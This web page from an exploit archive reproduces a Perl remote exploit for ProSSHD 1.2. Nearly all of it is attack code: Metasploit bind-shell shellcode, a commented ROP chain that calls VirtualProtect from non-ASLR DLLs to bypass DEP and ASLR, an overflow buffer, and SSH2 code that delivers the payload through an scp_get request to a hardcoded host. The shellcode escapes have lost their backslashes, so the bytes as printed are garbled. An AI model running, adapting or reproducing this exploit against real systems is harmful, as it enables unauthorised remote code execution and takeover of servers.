Home / os / win7

ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)

Posted on 03 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================
ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
============================================================

# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
# Code :
 
################################################################################
# Original exploit by S2 Crew [Hungary]
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on:  ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
#
# Special for XAKEP magazine  [www.xakep.ru]
#
#
# CVE: -
   
#!/usr/bin/perl
   
use Net::SSH2;
   
$username = '';
$password = '';
   
$host = '192.168.126.129';  #Remote host
#$host = '192.168.13.6';
$port = 22;
   
 
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
# AutoRunScript=
$shell =
&quot;xbaxdax29x13xdaxd9xe9xd9x74x24xf4x58x31xc9&quot; .
&quot;xb1x56x31x50x13x83xc0x04x03x50xd5xcbxe6x26&quot; .
&quot;x01x82x09xd7xd1xf5x80x32xe0x27xf6x37x50xf8&quot; .
&quot;x7cx15x58x73xd0x8exebxf1xfdxa1x5cxbfxdbx8c&quot; .
&quot;x5dx71xe4x43x9dx13x98x99xf1xf3xa1x51x04xf5&quot; .
&quot;xe6x8cxe6xa7xbfxdbx54x58xcbx9ex64x59x1bx95&quot; .
&quot;xd4x21x1ex6axa0x9bx21xbbx18x97x6ax23x13xff&quot; .
&quot;x4ax52xf0xe3xb7x1dx7dxd7x4cx9cx57x29xacxae&quot; .
&quot;x97xe6x93x1ex1axf6xd4x99xc4x8dx2exdax79x96&quot; .
&quot;xf4xa0xa5x13xe9x03x2ex83xc9xb2xe3x52x99xb9&quot; .
&quot;x48x10xc5xddx4fxf5x7dxd9xc4xf8x51x6bx9exde&quot; .
&quot;x75x37x45x7ex2fx9dx28x7fx2fx79x95x25x3bx68&quot; .
&quot;xc2x5cx66xe5x27x53x99xf5x2fxe4xeaxc7xf0x5e&quot; .
&quot;x65x64x79x79x72x8bx50x3dxecx72x5ax3ex24xb1&quot; .
&quot;x0ex6ex5ex10x2exe5x9ex9dxfbxaaxcex31x53x0b&quot; .
&quot;xbfxf1x03xe3xd5xfdx7cx13xd6xd7x0bx13x18x03&quot; .
&quot;x58xf4x59xb3x4fx58xd7x55x05x70xb1xcexb1xb2&quot; .
&quot;xe6xc6x26xccxccx7axffx5ax58x95xc7x65x59xb3&quot; .
&quot;x64xc9xf1x54xfex01xc6x45x01x0cx6ex0fx3axc7&quot; .
&quot;xe4x61x89x79xf8xabx79x19x6bx30x79x54x90xef&quot; .
&quot;x2ex31x66xe6xbaxafxd1x50xd8x2dx87x9bx58xea&quot; .
&quot;x74x25x61x7fxc0x01x71xb9xc9x0dx25x15x9cxdb&quot; .
&quot;x93xd3x76xaax4dx8ax25x64x19x4bx06xb7x5fx54&quot; .
&quot;x43x41xbfxe5x3ax14xc0xcaxaax90xb9x36x4bx5e&quot; .
&quot;x10xf3x7bx15x38x52x14xf0xa9xe6x79x03x04x24&quot; .
&quot;x84x80xacxd5x73x98xc5xd0x38x1ex36xa9x51xcb&quot; .
&quot;x38x1ex51xde&quot;;
 
 
   
$fuzz = &quot;x41&quot;x491 .  # buffer before RET addr rewriting
 
###############################   ROP  
# All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL  
# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)
# this make stack executable:
 
#### RET rewrite###
&quot;x9Fx07x37x7C&quot;.  # MOV EAX, EDI / POP EDI / POP ESI / RETN  ; EAX points on our stack data with some offset
 
&quot;x11x11x11x11&quot;.  # JUNK---------------^^^       ^^^ 
&quot;x22x22x22x22&quot;.  # JUNK-------------------------^^^
&quot;x27x34x34x7C&quot;.  # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
&quot;x33x33x33x33&quot;.  # JUNK------------------------------^^^
 
&quot;xC1x4Cx34x7C&quot;.  # POP EAX  / RETN
                     #     ^^^
&quot;x33x33x33x33&quot;.  #     ^^^
&quot;x33x33x33x33&quot;.  #     ^^^
&quot;x33x33x33x33&quot;.  #     ^^^
&quot;x33x33x33x33&quot;.  #     ^^^
                     #     ^^^
&quot;xC0xFFxFFxFF&quot;.  # ----^^^  Param for next instruction...
&quot;x05x1ex35x7C&quot;.  # NEG EAX /  RETN     ; EAX will be 0x40 (param for VirtualProtect)
 
&quot;xc8x03x35x7C&quot;.  # MOV DS:[ECX], EAX / RETN    ; save 0x40 (3 param)
&quot;x40xa0x35x7C&quot;.  # MOV EAX, ECX / RETN         ; restore pointer in EAX
 
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN             ; Change position
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN                     
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN              ; EAX=ECX-0x0c
 
&quot;x08x94x16x7C&quot;.  # MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)
 
&quot;xB9x1Fx34x7C&quot;.  # INC EAX / RETN               ; oh ... and move pointer back
&quot;xB9x1Fx34x7C&quot;.  # INC EAX / RETN
&quot;xB9x1Fx34x7C&quot;.  # INC EAX / RETN
&quot;xB9x1Fx34x7C&quot;.  # INC EAX / RETN               ; EAX=ECX=0x8
 
&quot;xB2x01x15x7C&quot;.  # MOV [EAX+0x4], 1         ; size for VirtualProtect (2 param)
 
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN             ; Change position for output from VirtualProtect
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN                     
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
&quot;xA1x1Dx34x7C&quot;.  # DEC EAX  / RETN
 
&quot;x27x34x34x7C&quot;.  # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
&quot;x33x33x33x33&quot;.  # JUNK------------------------------^^^
 
&quot;x40xa0x35x7C&quot;.  # MOV EAX, ECX / RETN         ; restore pointer in EAX
                     #     
&quot;x33x33x33x33&quot;.  #    
&quot;x33x33x33x33&quot;.  #    
&quot;x33x33x33x33&quot;.  #    
&quot;x33x33x33x33&quot;.  #    
 
&quot;xB9x1Fx34x7C&quot;.  # INC EAX / RETN              ; and again...
&quot;xB9x1Fx34x7C&quot;.  # INC EAX / RETN
&quot;xB9x1Fx34x7C&quot;.  # INC EAX / RETN
&quot;xB9x1Fx34x7C&quot;.  # INC EAX / RETN
 
&quot;xE5x6Bx36x7C&quot;.   # MOV DS:[EAX+0x14], ECX             ; save output addr for VirtualProtect (4 param)
 
&quot;xBAx1Fx34x7C&quot;x204 . # RETN fill.....
 
&quot;xDDx28x35x7C&quot;.  # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN  ;Call VirtualProtect
&quot;AAAABBBBCCCCDDDD&quot;.   # Here is place for params (VirtualProtect)
 
####################### retrun into stack after VirtualProtect
&quot;x1AxF2x35x7C&quot;.   # ADD ESP, 0xC / RETN                        ; take next ret
&quot;XXXYYYZZZ123&quot;.       # trash
&quot;x30x5Cx34x7C&quot;.   # 0x7c345c2e: ANDPS XMM0, XMM3  -- (+0x2 to address and....)  --&gt; PUSH ESP / RETN ; EIP=ESP
 
&quot;x90&quot;x14 .           # NOPs here is the begining of shellcode
 
$shell;           # shellcode 8)
     
   
$ssh2 = Net::SSH2-&gt;new();
$ssh2-&gt;connect($host, $port) || die &quot;
Error: Connection Refused!
&quot;;
$ssh2-&gt;auth_password($username, $password) || die &quot;
Error: Username/Password Denied!
&quot;;
#sleep(10);
$scpget = $ssh2-&gt;scp_get($fuzz);
$ssh2-&gt;disconnect();


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :